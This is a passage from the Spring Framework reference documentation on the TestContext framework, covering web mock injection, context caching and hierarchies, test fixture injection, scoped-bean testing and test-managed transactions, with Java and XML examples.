a\n`WebApplicationContext` this <<testcontext-key-abstractions,TestExecutionListener>> sets\nup default thread-local state via Spring Web's `RequestContextHolder` before each test\nmethod and creates a `MockHttpServletRequest`, `MockHttpServletResponse`, and\n`ServletWebRequest` based on the base resource path configured via\n`@WebAppConfiguration`. 
`ServletTestExecutionListener` also ensures that the\n`MockHttpServletResponse` and `ServletWebRequest` can be injected into the test\ninstance, and once the test is complete it cleans up thread-local state.\n\nOnce you have a `WebApplicationContext` loaded for your test you might find that you\nneed to interact with the web mocks -- for example, to set up your test fixture or to\nperform assertions after invoking your web component. The following example demonstrates\nwhich mocks can be autowired into your test instance. Note that the\n`WebApplicationContext` and `MockServletContext` are both cached across the test suite;\nwhereas, the other mocks are managed per test method by the\n`ServletTestExecutionListener`.\n\n.Injecting mocks\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextConfiguration\n\tpublic class WacTests {\n\n\t\t@Autowired\n\t\tWebApplicationContext wac; \/\/ cached\n\n\t\t@Autowired\n\t\tMockServletContext servletContext; \/\/ cached\n\n\t\t@Autowired\n\t\tMockHttpSession session;\n\n\t\t@Autowired\n\t\tMockHttpServletRequest request;\n\n\t\t@Autowired\n\t\tMockHttpServletResponse response;\n\n\t\t@Autowired\n\t\tServletWebRequest webRequest;\n\n\t\t\/\/...\n\t}\n----\n--\n\n[[testcontext-ctx-management-caching]]\n===== Context caching\n\nOnce the TestContext framework loads an `ApplicationContext` (or `WebApplicationContext`)\nfor a test, that context will be cached and reused for __all__ subsequent tests that\ndeclare the same unique context configuration within the same test suite. To understand\nhow caching works, it is important to understand what is meant by __unique__ and __test\nsuite__.\n\nAn `ApplicationContext` can be __uniquely__ identified by the combination of\nconfiguration parameters that is used to load it. Consequently, the unique combination\nof configuration parameters is used to generate a __key__ under which the context is\ncached. The TestContext framework uses the following configuration parameters to build\nthe context cache key:\n\n* `locations` __(from @ContextConfiguration)__\n* `classes` __(from @ContextConfiguration)__\n* `contextInitializerClasses` __(from @ContextConfiguration)__\n* `contextCustomizers` __(from ContextCustomizerFactory)__\n* `contextLoader` __(from @ContextConfiguration)__\n* `parent` __(from @ContextHierarchy)__\n* `activeProfiles` __(from @ActiveProfiles)__\n* `propertySourceLocations` __(from @TestPropertySource)__\n* `propertySourceProperties` __(from @TestPropertySource)__\n* `resourceBasePath` __(from @WebAppConfiguration)__\n\nFor example, if `TestClassA` specifies `{\"app-config.xml\", \"test-config.xml\"}` for the\n`locations` (or `value`) attribute of `@ContextConfiguration`, the TestContext framework\nwill load the corresponding `ApplicationContext` and store it in a `static` context cache\nunder a key that is based solely on those locations. So if `TestClassB` also defines\n`{\"app-config.xml\", \"test-config.xml\"}` for its locations (either explicitly or\nimplicitly through inheritance) but does not define `@WebAppConfiguration`, a different\n`ContextLoader`, different active profiles, different context initializers, different\ntest property sources, or a different parent context, then the same `ApplicationContext`\nwill be shared by both test classes. 
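To make the sharing scenario concrete, the two test classes just described might look
like the following sketch (the configuration file names are taken from the example above
and are otherwise hypothetical).

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@ContextConfiguration({"app-config.xml", "test-config.xml"})
	public class TestClassA {
		// tests that use the context...
	}

	@RunWith(SpringRunner.class)
	@ContextConfiguration({"app-config.xml", "test-config.xml"})
	public class TestClassB {
		// identical context configuration: the cached context is reused
	}
----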
This means that the setup cost for loading an\napplication context is incurred only once (per test suite), and subsequent test execution\nis much faster.\n\n.Test suites and forked processes\n[NOTE]\n====\nThe Spring TestContext framework stores application contexts in a __static__ cache. This\nmeans that the context is literally stored in a `static` variable. In other words, if\ntests execute in separate processes the static cache will be cleared between each test\nexecution, and this will effectively disable the caching mechanism.\n\nTo benefit from the caching mechanism, all tests must run within the same process or\ntest suite. This can be achieved by executing all tests as a group within an IDE.\nSimilarly, when executing tests with a build framework such as Ant, Maven, or Gradle it\nis important to make sure that the build framework does not __fork__ between tests. For\nexample, if the\nhttp:\/\/maven.apache.org\/plugins\/maven-surefire-plugin\/test-mojo.html#forkMode[forkMode]\nfor the Maven Surefire plug-in is set to `always` or `pertest`, the TestContext\nframework will not be able to cache application contexts between test classes and the\nbuild process will run significantly slower as a result.\n====\n\nSince Spring Framework 4.3, the size of the context cache is bounded with a default\nmaximum size of 32. Whenever the maximum size is reached, a _least recently used_ (LRU)\neviction policy is used to evict and close stale contexts. The maximum size can be\nconfigured from the command line or a build script by setting a JVM system property named\n`spring.test.context.cache.maxSize`. As an alternative, the same property can be set\nprogrammatically via the `SpringProperties` API.\n\nSince having a large number of application contexts loaded within a given test suite can\ncause the suite to take an unnecessarily long time to execute, it is often beneficial to\nknow exactly how many contexts have been loaded and cached. To view the statistics for\nthe underlying context cache, simply set the log level for the\n`org.springframework.test.context.cache` logging category to `DEBUG`.\n\nIn the unlikely case that a test corrupts the application context and requires reloading\n-- for example, by modifying a bean definition or the state of an application object --\nyou can annotate your test class or test method with `@DirtiesContext` (see the\ndiscussion of `@DirtiesContext` in <<integration-testing-annotations-spring>>). This\ninstructs Spring to remove the context from the cache and rebuild the application\ncontext before executing the next test. Note that support for the `@DirtiesContext`\nannotation is provided by the `DirtiesContextBeforeModesTestExecutionListener` and the\n`DirtiesContextTestExecutionListener` which are enabled by default.\n\n\n[[testcontext-ctx-management-ctx-hierarchies]]\n===== Context hierarchies\n\nWhen writing integration tests that rely on a loaded Spring `ApplicationContext`, it is\noften sufficient to test against a single context; however, there are times when it is\nbeneficial or even necessary to test against a hierarchy of ``ApplicationContext``s. For\nexample, if you are developing a Spring MVC web application you will typically have a\nroot `WebApplicationContext` loaded via Spring's `ContextLoaderListener` and a child\n`WebApplicationContext` loaded via Spring's `DispatcherServlet`. 
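For illustration only, such a deployment is commonly bootstrapped with a
`WebApplicationInitializer`; the following sketch assumes hypothetical `RootConfig` and
`WebConfig` `@Configuration` classes.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class WebAppInitializer extends AbstractAnnotationConfigDispatcherServletInitializer {

		@Override
		protected Class<?>[] getRootConfigClasses() {
			// root WebApplicationContext, registered via ContextLoaderListener
			return new Class<?>[] {RootConfig.class};
		}

		@Override
		protected Class<?>[] getServletConfigClasses() {
			// child WebApplicationContext for the DispatcherServlet
			return new Class<?>[] {WebConfig.class};
		}

		@Override
		protected String[] getServletMappings() {
			return new String[] {"/"};
		}
	}
----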
This results in a\nparent-child context hierarchy where shared components and infrastructure configuration\nare declared in the root context and consumed in the child context by web-specific\ncomponents. Another use case can be found in Spring Batch applications where you often\nhave a parent context that provides configuration for shared batch infrastructure and a\nchild context for the configuration of a specific batch job.\n\nSince Spring Framework 3.2.2, it is possible to write integration tests that use context\nhierarchies by declaring context configuration via the `@ContextHierarchy` annotation,\neither on an individual test class or within a test class hierarchy. If a context\nhierarchy is declared on multiple classes within a test class hierarchy it is also\npossible to merge or override the context configuration for a specific, named level in\nthe context hierarchy. When merging configuration for a given level in the hierarchy the\nconfiguration resource type (i.e., XML configuration files or annotated classes) must be\nconsistent; otherwise, it is perfectly acceptable to have different levels in a context\nhierarchy configured using different resource types.\n\nThe following JUnit 4 based examples demonstrate common configuration scenarios for\nintegration tests that require the use of context hierarchies.\n\n.Single test class with context hierarchy\n--\n`ControllerIntegrationTests` represents a typical integration testing scenario for a\nSpring MVC web application by declaring a context hierarchy consisting of two levels,\none for the __root__ WebApplicationContext (loaded using the `TestAppConfig`\n`@Configuration` class) and one for the __dispatcher servlet__ `WebApplicationContext`\n(loaded using the `WebConfig` `@Configuration` class). The `WebApplicationContext` that\nis __autowired__ into the test instance is the one for the child context (i.e., the\nlowest context in the hierarchy).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = TestAppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class ControllerIntegrationTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ ...\n\t}\n----\n\n--\n\n\n.Class hierarchy with implicit parent context\n--\nThe following test classes define a context hierarchy within a test class hierarchy.\n`AbstractWebTests` declares the configuration for a root `WebApplicationContext` in a\nSpring-powered web application. Note, however, that `AbstractWebTests` does not declare\n`@ContextHierarchy`; consequently, subclasses of `AbstractWebTests` can optionally\nparticipate in a context hierarchy or simply follow the standard semantics for\n`@ContextConfiguration`. `SoapWebServiceTests` and `RestWebServiceTests` both extend\n`AbstractWebTests` and define a context hierarchy via `@ContextHierarchy`. 
The result is
that three application contexts will be loaded (one for each declaration of
`@ContextConfiguration`), and the application context loaded based on the configuration
in `AbstractWebTests` will be set as the parent context for each of the contexts loaded
for the concrete subclasses.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@WebAppConfiguration
	@ContextConfiguration("file:src/main/webapp/WEB-INF/applicationContext.xml")
	public abstract class AbstractWebTests {}

	@ContextHierarchy(@ContextConfiguration("/spring/soap-ws-config.xml"))
	public class SoapWebServiceTests extends AbstractWebTests {}

	@ContextHierarchy(@ContextConfiguration("/spring/rest-ws-config.xml"))
	public class RestWebServiceTests extends AbstractWebTests {}
----
--


.Class hierarchy with merged context hierarchy configuration
--
The following classes demonstrate the use of __named__ hierarchy levels in order to
__merge__ the configuration for specific levels in a context hierarchy. `BaseTests`
defines two levels in the hierarchy, `parent` and `child`. `ExtendedTests` extends
`BaseTests` and instructs the Spring TestContext Framework to merge the context
configuration for the `child` hierarchy level, simply by ensuring that the names
declared via the `name` attribute in `@ContextConfiguration` are both `"child"`. The
result is that three application contexts will be loaded: one for `"/app-config.xml"`,
one for `"/user-config.xml"`, and one for `{"/user-config.xml", "/order-config.xml"}`.
As with the previous example, the application context loaded from `"/app-config.xml"`
will be set as the parent context for the contexts loaded from `"/user-config.xml"`
and `{"/user-config.xml", "/order-config.xml"}`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@ContextHierarchy({
		@ContextConfiguration(name = "parent", locations = "/app-config.xml"),
		@ContextConfiguration(name = "child", locations = "/user-config.xml")
	})
	public class BaseTests {}

	@ContextHierarchy(
		@ContextConfiguration(name = "child", locations = "/order-config.xml")
	)
	public class ExtendedTests extends BaseTests {}
----
--

.Class hierarchy with overridden context hierarchy configuration
--
In contrast to the previous example, this example demonstrates how to __override__ the
configuration for a given named level in a context hierarchy by setting the
`inheritLocations` flag in `@ContextConfiguration` to `false`.
Consequently, the\napplication context for `ExtendedTests` will be loaded only from\n`\"\/test-user-config.xml\"` and will have its parent set to the context loaded from\n`\"\/app-config.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(\n\t\t\tname = \"child\",\n\t\t\tlocations = \"\/test-user-config.xml\",\n\t\t\tinheritLocations = false\n\t))\n\tpublic class ExtendedTests extends BaseTests {}\n----\n\n.Dirtying a context within a context hierarchy\n[NOTE]\n====\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy, the `hierarchyMode` flag can be used to control how the context cache is\ncleared. For further details consult the discussion of `@DirtiesContext` in\n<<integration-testing-annotations-spring,Spring Testing Annotations>> and the\n`@DirtiesContext` javadocs.\n====\n--\n\n\n[[testcontext-fixture-di]]\n==== Dependency injection of test fixtures\nWhen you use the `DependencyInjectionTestExecutionListener` -- which is configured by\ndefault -- the dependencies of your test instances are __injected__ from beans in the\napplication context that you configured with `@ContextConfiguration`. You may use setter\ninjection, field injection, or both, depending on which annotations you choose and\nwhether you place them on setter methods or fields. For consistency with the annotation\nsupport introduced in Spring 2.5 and 3.0, you can use Spring's `@Autowired` annotation\nor the `@Inject` annotation from JSR 330.\n\n[TIP]\n====\n\nThe TestContext framework does not instrument the manner in which a test instance is\ninstantiated. Thus the use of `@Autowired` or `@Inject` for constructors has no effect\nfor test classes.\n====\n\nBecause `@Autowired` is used to perform <<core.adoc#beans-factory-autowire, __autowiring by type__\n>>, if you have multiple bean definitions of the same type, you cannot rely on this\napproach for those particular beans. In that case, you can use `@Autowired` in\nconjunction with `@Qualifier`. As of Spring 3.0 you may also choose to use `@Inject` in\nconjunction with `@Named`. Alternatively, if your test class has access to its\n`ApplicationContext`, you can perform an explicit lookup by using (for example) a call\nto `applicationContext.getBean(\"titleRepository\")`.\n\nIf you do not want dependency injection applied to your test instances, simply do not\nannotate fields or setter methods with `@Autowired` or `@Inject`. Alternatively, you can\ndisable dependency injection altogether by explicitly configuring your class with\n`@TestExecutionListeners` and omitting `DependencyInjectionTestExecutionListener.class`\nfrom the list of listeners.\n\nConsider the scenario of testing a `HibernateTitleRepository` class, as outlined in the\n<<integration-testing-goals,Goals>> section. The next two code listings demonstrate the\nuse of `@Autowired` on fields and setter methods. The application context configuration\nis presented after all sample code listings.\n\n[NOTE]\n====\nThe dependency injection behavior in the following code listings is not specific to\nJUnit 4. 
The same DI techniques can be used in conjunction with any testing framework.\n\nThe following examples make calls to static assertion methods such as `assertNotNull()`\nbut without prepending the call with `Assert`. In such cases, assume that the method was\nproperly imported through an `import static` declaration that is not shown in the\nexample.\n====\n\nThe first code listing shows a JUnit 4 based implementation of the test class that uses\n`@Autowired` for field injection.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\t**@Autowired**\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nAlternatively, you can configure the class to use `@Autowired` for setter injection as\nseen below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ specifies the Spring configuration to load for this test fixture\n\t**@ContextConfiguration(\"repository-config.xml\")**\n\tpublic class HibernateTitleRepositoryTests {\n\n\t\t\/\/ this instance will be dependency injected by type\n\t\tprivate HibernateTitleRepository titleRepository;\n\n\t\t**@Autowired**\n\t\tpublic void setTitleRepository(HibernateTitleRepository titleRepository) {\n\t\t\tthis.titleRepository = titleRepository;\n\t\t}\n\n\t\t@Test\n\t\tpublic void findById() {\n\t\t\tTitle title = titleRepository.findById(new Long(10));\n\t\t\tassertNotNull(title);\n\t\t}\n\t}\n----\n\nThe preceding code listings use the same XML context file referenced by the\n`@ContextConfiguration` annotation (that is, `repository-config.xml`), which looks like\nthis:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<!-- this bean will be injected into the HibernateTitleRepositoryTests class -->\n\t\t<bean id=\"**titleRepository**\" class=\"**com.foo.repository.hibernate.HibernateTitleRepository**\">\n\t\t\t<property name=\"sessionFactory\" ref=\"sessionFactory\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"sessionFactory\" class=\"org.springframework.orm.hibernate5.LocalSessionFactoryBean\">\n\t\t\t<!-- configuration elided for brevity -->\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[NOTE]\n====\nIf you are extending from a Spring-provided test base class that happens to use\n`@Autowired` on one of its setter methods, you might have multiple beans of the affected\ntype defined in your application context: for example, multiple `DataSource` beans. 
In\nsuch a case, you can override the setter method and use the `@Qualifier` annotation to\nindicate a specific target bean as follows, but make sure to delegate to the overridden\nmethod in the superclass as well.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t\t@Autowired\n\t\t@Override\n\t\tpublic void setDataSource(**@Qualifier(\"myDataSource\")** DataSource dataSource) {\n\t\t\t**super**.setDataSource(dataSource);\n\t\t}\n\n\t\/\/ ...\n----\n\nThe specified qualifier value indicates the specific `DataSource` bean to inject,\nnarrowing the set of type matches to a specific bean. Its value is matched against\n`<qualifier>` declarations within the corresponding `<bean>` definitions. The bean name\nis used as a fallback qualifier value, so you may effectively also point to a specific\nbean by name there (as shown above, assuming that \"myDataSource\" is the bean id).\n====\n\n\n[[testcontext-web-scoped-beans]]\n==== Testing request and session scoped beans\n\n<<beans-factory-scopes-other,Request and session scoped beans>> have been supported by\nSpring since the early years, and since Spring 3.2 it's a breeze to test your\nrequest-scoped and session-scoped beans by following these steps.\n\n* Ensure that a `WebApplicationContext` is loaded for your test by annotating your test\n class with `@WebAppConfiguration`.\n* Inject the mock request or session into your test instance and prepare your test\n fixture as appropriate.\n* Invoke your web component that you retrieved from the configured\n `WebApplicationContext` (i.e., via dependency injection).\n* Perform assertions against the mocks.\n\nThe following code snippet displays the XML configuration for a login use case. Note\nthat the `userService` bean has a dependency on a request-scoped `loginAction` bean.\nAlso, the `LoginAction` is instantiated using <<core.adoc#expressions,SpEL expressions>> that\nretrieve the username and password from the current HTTP request. In our test, we will\nwant to configure these request parameters via the mock managed by the TestContext\nframework.\n\n.Request-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:loginAction-ref=\"loginAction\" \/>\n\n\t\t<bean id=\"loginAction\" class=\"com.example.LoginAction\"\n\t\t\t\tc:username=\"#{request.getParameter('user')}\"\n\t\t\t\tc:password=\"#{request.getParameter('pswd')}\"\n\t\t\t\tscope=\"request\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `RequestScopedBeanTests` we inject both the `UserService` (i.e., the subject under\ntest) and the `MockHttpServletRequest` into our test instance. Within our\n`requestScope()` test method we set up our test fixture by setting request parameters in\nthe provided `MockHttpServletRequest`. When the `loginUser()` method is invoked on our\n`userService` we are assured that the user service has access to the request-scoped\n`loginAction` for the current `MockHttpServletRequest` (i.e., the one we just set\nparameters in). 
We can then perform assertions against the results based on the known\ninputs for the username and password.\n\n.Request-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class RequestScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpServletRequest request;\n\n\t\t@Test\n\t\tpublic void requestScope() {\n\n\t\t\trequest.setParameter(\"user\", \"enigma\");\n\t\t\trequest.setParameter(\"pswd\", \"$pr!ng\");\n\n\t\t\tLoginResults results = userService.loginUser();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\nThe following code snippet is similar to the one we saw above for a request-scoped bean;\nhowever, this time the `userService` bean has a dependency on a session-scoped\n`userPreferences` bean. Note that the `UserPreferences` bean is instantiated using a\nSpEL expression that retrieves the __theme__ from the current HTTP session. In our test,\nwe will need to configure a theme in the mock session managed by the TestContext\nframework.\n\n.Session-scoped bean configuration\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<bean id=\"userService\"\n\t\t\t\tclass=\"com.example.SimpleUserService\"\n\t\t\t\tc:userPreferences-ref=\"userPreferences\" \/>\n\n\t\t<bean id=\"userPreferences\"\n\t\t\t\tclass=\"com.example.UserPreferences\"\n\t\t\t\tc:theme=\"#{session.getAttribute('theme')}\"\n\t\t\t\tscope=\"session\">\n\t\t\t<aop:scoped-proxy \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nIn `SessionScopedBeanTests` we inject the `UserService` and the `MockHttpSession` into\nour test instance. Within our `sessionScope()` test method we set up our test fixture by\nsetting the expected \"theme\" attribute in the provided `MockHttpSession`. When the\n`processUserPreferences()` method is invoked on our `userService` we are assured that\nthe user service has access to the session-scoped `userPreferences` for the current\n`MockHttpSession`, and we can perform assertions against the results based on the\nconfigured theme.\n\n.Session-scoped bean test\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t@WebAppConfiguration\n\tpublic class SessionScopedBeanTests {\n\n\t\t@Autowired UserService userService;\n\t\t@Autowired MockHttpSession session;\n\n\t\t@Test\n\t\tpublic void sessionScope() throws Exception {\n\n\t\t\tsession.setAttribute(\"theme\", \"blue\");\n\n\t\t\tResults results = userService.processUserPreferences();\n\n\t\t\t\/\/ assert results\n\t\t}\n\t}\n----\n\n[[testcontext-tx]]\n==== Transaction management\n\nIn the TestContext framework, transactions are managed by the\n`TransactionalTestExecutionListener` which is configured by default, even if you do not\nexplicitly declare `@TestExecutionListeners` on your test class. To enable support for\ntransactions, however, you must configure a `PlatformTransactionManager` bean in the\n`ApplicationContext` that is loaded via `@ContextConfiguration` semantics (further\ndetails are provided below). In addition, you must declare Spring's `@Transactional`\nannotation either at the class or method level for your tests.\n\n[[testcontext-tx-test-managed-transactions]]\n===== Test-managed transactions\n\n_Test-managed transactions_ are transactions that are managed _declaratively_ via the\n`TransactionalTestExecutionListener` or _programmatically_ via `TestTransaction` (see\nbelow). 
Such transactions should not be confused with _Spring-managed transactions_\n(i.e., those managed directly by Spring within the `ApplicationContext` loaded for tests)\nor _application-managed transactions_ (i.e., those managed programmatically within\napplication code that is invoked via tests). Spring-managed and application-managed\ntransactions will typically participate in test-managed transactions; however, caution\nshould be taken if Spring-managed or application-managed transactions are configured with\nany _propagation_ type other than `REQUIRED` or `SUPPORTS` (see the discussion on\n<<data-access.adoc#tx-propagation,transaction propagation>> for details).\n\n[[testcontext-tx-enabling-transactions]]\n===== Enabling and disabling transactions\n\nAnnotating a test method with `@Transactional` causes the test to be run within a\ntransaction that will, by default, be automatically rolled back after completion of the\ntest. If a test class is annotated with `@Transactional`, each test method within that\nclass hierarchy will be run within a transaction. Test methods that are not annotated\nwith `@Transactional` (at the class or method level) will not be run within a\ntransaction. Furthermore, tests that are annotated with `@Transactional` but have the\n`propagation` type set to `NOT_SUPPORTED` will not be run within a transaction.\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nare preconfigured for transactional support at the class level.__\n\nThe following example demonstrates a common scenario for writing an integration test for\na Hibernate-based `UserRepository`. As explained in\n<<testcontext-tx-rollback-and-commit-behavior>>, there is no need to clean up the\ndatabase after the `createUser()` method is executed since any changes made to the\ndatabase will be automatically rolled back by the `TransactionalTestExecutionListener`.\nSee <<testing-examples-petclinic>> for an additional example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = TestConfig.class)\n\t@Transactional\n\tpublic class HibernateUserRepositoryTests {\n\n\t\t@Autowired\n\t\tHibernateUserRepository repository;\n\n\t\t@Autowired\n\t\tSessionFactory sessionFactory;\n\n\t\tJdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic void setDataSource(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\tpublic void createUser() {\n\t\t\t\/\/ track initial state in test database:\n\t\t\tfinal int count = countRowsInTable(\"user\");\n\n\t\t\tUser user = new User(...);\n\t\t\trepository.save(user);\n\n\t\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\t\tsessionFactory.getCurrentSession().flush();\n\t\t\tassertNumUsers(count + 1);\n\t\t}\n\n\t\tprotected int countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-rollback-and-commit-behavior]]\n===== Transaction rollback and commit behavior\n\nBy default, test transactions will be automatically rolled back after completion of the\ntest; however, transactional commit and rollback behavior can be configured declaratively\nvia 
the `@Commit` and `@Rollback` annotations. See the corresponding entries in the\n<<integration-testing-annotations,annotation support>> section for further details.\n\n[[testcontext-tx-programmatic-tx-mgt]]\n===== Programmatic transaction management\nSince Spring Framework 4.1, it is possible to interact with test-managed transactions\n_programmatically_ via the static methods in `TestTransaction`. For example,\n`TestTransaction` may be used within _test_ methods, _before_ methods, and _after_\nmethods to start or end the current test-managed transaction or to configure the current\ntest-managed transaction for rollback or commit. Support for `TestTransaction` is\nautomatically available whenever the `TransactionalTestExecutionListener` is enabled.\n\nThe following example demonstrates some of the features of `TestTransaction`. Consult the\njavadocs for `TestTransaction` for further details.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration(classes = TestConfig.class)\n\tpublic class ProgrammaticTransactionManagementTests extends\n\t\t\tAbstractTransactionalJUnit4SpringContextTests {\n\t\n\t\t@Test\n\t\tpublic void transactionalTest() {\n\t\t\t\/\/ assert initial state in test database:\n\t\t\tassertNumUsers(2);\n\n\t\t\tdeleteFromTables(\"user\");\n\n\t\t\t\/\/ changes to the database will be committed!\n\t\t\tTestTransaction.flagForCommit();\n\t\t\tTestTransaction.end();\n\t\t\tassertFalse(TestTransaction.isActive());\n\t\t\tassertNumUsers(0);\n\n\t\t\tTestTransaction.start();\n\t\t\t\/\/ perform other actions against the database that will\n\t\t\t\/\/ be automatically rolled back after the test completes...\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-before-and-after-tx]]\n===== Executing code outside of a transaction\n\nOccasionally you need to execute certain code before or after a transactional test method\nbut outside the transactional context -- for example, to verify the initial database state\nprior to execution of your test or to verify expected transactional commit behavior after\ntest execution (if the test was configured to commit the transaction).\n`TransactionalTestExecutionListener` supports the `@BeforeTransaction` and\n`@AfterTransaction` annotations exactly for such scenarios. Simply annotate any `void`\nmethod in a test class or any `void` default method in a test interface with one of these\nannotations, and the `TransactionalTestExecutionListener` ensures that your __before\ntransaction method__ or __after transaction method__ is executed at the appropriate time.\n\n[TIP]\n====\nAny __before methods__ (such as methods annotated with JUnit Jupiter's `@BeforeEach`) and\nany __after methods__ (such as methods annotated with JUnit Jupiter's `@AfterEach`) are\nexecuted __within__ a transaction. In addition, methods annotated with\n`@BeforeTransaction` or `@AfterTransaction` are naturally not executed for test methods\nthat are not configured to run within a transaction.\n====\n\n[[testcontext-tx-mgr-config]]\n===== Configuring a transaction manager\n\n`TransactionalTestExecutionListener` expects a `PlatformTransactionManager` bean to be\ndefined in the Spring `ApplicationContext` for the test. 
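For example, a minimal `@Configuration` class that satisfies this requirement might look
like the following sketch, which assumes an embedded database and a hypothetical
`schema.sql` script on the classpath.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Configuration
	public class TestConfig {

		@Bean
		public DataSource dataSource() {
			// an in-memory database is convenient for integration tests
			return new EmbeddedDatabaseBuilder()
					.generateUniqueName(true)
					.addScript("classpath:schema.sql")
					.build();
		}

		@Bean
		public PlatformTransactionManager transactionManager(DataSource dataSource) {
			return new DataSourceTransactionManager(dataSource);
		}
	}
----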
In case there are multiple\ninstances of `PlatformTransactionManager` within the test's `ApplicationContext`, a\n_qualifier_ may be declared via `@Transactional(\"myTxMgr\")` or\n`@Transactional(transactionManager = \"myTxMgr\")`, or `TransactionManagementConfigurer`\ncan be implemented by an `@Configuration` class. Consult the javadocs for\n`TestContextTransactionUtils.retrieveTransactionManager()` for details on the algorithm\nused to look up a transaction manager in the test's `ApplicationContext`.\n\n[[testcontext-tx-annotation-demo]]\n===== Demonstration of all transaction-related annotations\n\nThe following JUnit 4 based example displays a _fictitious_ integration testing scenario\nhighlighting all transaction-related annotations. The example is **not** intended to\ndemonstrate best practices but rather to demonstrate how these annotations can be used.\nConsult the <<integration-testing-annotations,annotation support>> section for further\ninformation and configuration examples. <<testcontext-executing-sql-declaratively-tx,\nTransaction management for `@Sql`>> contains an additional example using `@Sql` for\ndeclarative SQL script execution with default transaction rollback semantics.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t**@Transactional(transactionManager = \"txMgr\")**\n\t**@Commit**\n\tpublic class FictitiousTransactionalTest {\n\n\t\t**@BeforeTransaction**\n\t\tvoid verifyInitialDatabaseState() {\n\t\t\t\/\/ logic to verify the initial state before a transaction is started\n\t\t}\n\n\t\t@Before\n\t\tpublic void setUpTestDataWithinTransaction() {\n\t\t\t\/\/ set up test data within the transaction\n\t\t}\n\n\t\t@Test\n\t\t\/\/ overrides the class-level @Commit setting\n\t\t**@Rollback**\n\t\tpublic void modifyDatabaseWithinTransaction() {\n\t\t\t\/\/ logic which uses the test data and modifies database state\n\t\t}\n\n\t\t@After\n\t\tpublic void tearDownWithinTransaction() {\n\t\t\t\/\/ execute \"tear down\" 